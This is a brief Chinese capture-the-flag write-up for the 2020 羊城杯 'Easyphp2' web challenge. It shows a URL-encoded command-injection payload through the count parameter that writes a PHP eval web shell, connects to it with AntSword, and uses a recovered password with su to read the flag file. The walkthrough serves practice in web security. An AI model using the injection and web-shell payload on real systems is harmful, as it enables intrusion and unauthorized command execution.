# [羊城杯 2020] Easyphp2
抓包看看,可以发现有个 pass 变量将他换一下成 GWHT 之后,发现页面改变
传递的框框是传在了 count 变量,在下面有回显,可以直接传参写马(记得 url 编码)
'%7C%20echo%20%22%3C%3F%3Deval(%5C%24_POST%5B'shell'%5D)%3F%3E%22%20%3E%20shell.php%20%7C%7C'
有了马直接蚁剑连接(但是不能直接访问 flag.txt):
还有 / GWHT/README 中有 md5 密码解密得:
GWHTCTF
在 / GWHT/system/of/a/down/flag.txt 中
printf "GWHTCTF" | su - GWHT -c 'cat /GWHT/system/of/a/down/flag.txt'
获取 flag
参考链接:https://blog.csdn.net/qq_46263951/article/details/119776951